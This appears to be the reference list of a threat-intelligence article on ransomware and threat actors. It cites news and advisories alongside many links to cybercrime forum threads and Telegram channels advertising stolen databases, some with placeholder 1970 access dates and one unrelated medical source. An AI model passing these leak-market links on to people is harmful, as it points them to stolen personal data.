  31. TA829 and UNK_GreenSec Share Tactics and Infrastructure in Ongoing Malware Campaigns – The Hacker News, accessed July 4, 2025, https://thehackernews.com/2025/07/ta829-and-unkgreensec-share-tactics-and.html
  32. HackingTeam – Wikipedia, accessed July 4, 2025, https://en.wikipedia.org/wiki/HackingTeam
  33. Cyber Signals: Into the Lion’s Den – Microsoft News, accessed July 4, 2025, https://news.microsoft.com/wp-content/uploads/prod/sites/626/2024/05/Cyber_Signals_Issue_7_May_2024-2.pdf
  34. Agencies warn of Ghost ransomware activity | AHA News – American Hospital Association, accessed July 4, 2025, https://www.aha.org/news/headline/2025-02-20-agencies-warn-ghost-ransomware-activity
  35. CISA, FBI, MS-ISAC warn of Ghost ransomware exploiting outdated systems across critical infrastructure – Industrial Cyber, accessed July 4, 2025, https://industrialcyber.co/cisa/cisa-fbi-ms-isac-warn-of-ghost-ransomware-exploiting-outdated-systems-across-critical-infrastructure/
  36. FBI Warns of Scattered Spider’s Expanding Attacks on Airlines Using Social Engineering, accessed July 4, 2025, https://thehackernews.com/2025/06/fbi-warns-of-scattered-spiders.html
  37. Flash Report: Threat Actors Seeking to Exploit California Wildfires Recovery Funds, accessed July 4, 2025, https://www.zerofox.com/intelligence/flash-report-threat-actors-seeking-to-exploit-california-wildfires-recovery-funds/
  38. What is a Cyber Threat Actor? | CrowdStrike, accessed July 4, 2025, https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/threat-actor/
  39. accessed January 1, 1970, https://darkforums.st/Thread-Source-Code-SOUTH-BREEZE-SCHOOL-BANGLADESH-DATA-BASE
  40. THE ROLE OF FGF23/KLOTHO IN MINERAL METABOLISM … – CORE, accessed July 4, 2025, https://core.ac.uk/download/70340681.pdf
  41. accessed January 1, 1970, https://t.me/handala_hack27/72
  42. suspicious-file-MFGSTAT-zip – LENOVO COMMUNITY, accessed July 4, 2025, https://forums.lenovo.com/t5/Security-Malware/suspicious-file-MFGSTAT-zip/m-p/5225097
  43. accessed January 1, 1970, https://darkforums.st/Thread-500K-TORGI-GOV-RU
  44. accessed January 1, 1970, https://xss.is/threads/141216/
  45. accessed January 1, 1970, https://forum.exploit.in/topic/261901/?do=findComment&comment=1579277
  46. accessed January 1, 1970, https://leakbase.la/threads/splento-com-2-2gb-database.40019/
  47. Cyber Kill Chain® | Lockheed Martin, accessed July 4, 2025, https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
  48. accessed January 1, 1970, https://darkforums.st/Thread-AKB48-DATABASE-HQ-MEMBERSHIP-AND-USER
  49. accessed January 1, 1970, https://t.me/c/2656447819/67
  50. accessed January 1, 1970, https://forum.exploit.in/topic/261896/?tab=comments#comment-1579251
  51. accessed January 1, 1970, https://t.me/Z_alliance_ru/325
  52. accessed January 1, 1970, https://darkforums.st/Thread-Selling-Morocco-social-insurance-April-DB
  53. accessed January 1, 1970, https://xss.is/threads/141215/
  54. accessed January 1, 1970, https://xss.is/threads/141214/
  55. accessed January 1, 1970, https://darkforums.st/Thread-150K-UK-CAR-INSURANCE-MEMBERS
  56. accessed January 1, 1970, https://darkforums.st/Thread-Document-DATABASE-BPJS-FORM-INDONESIA–15996
  57. accessed January 1, 1970, https://xss.is/threads/141210/
  58. accessed January 1, 1970, https://forum.exploit.in/topic/261887/
  59. accessed January 1, 1970, https://t.me/liwaamohammad/454
  60. accessed January 1, 1970, https://darkforums.st/Thread-Document-Emirate-secret-data
  61. accessed January 1, 1970, https://xss.is/threads/141206/

Related Posts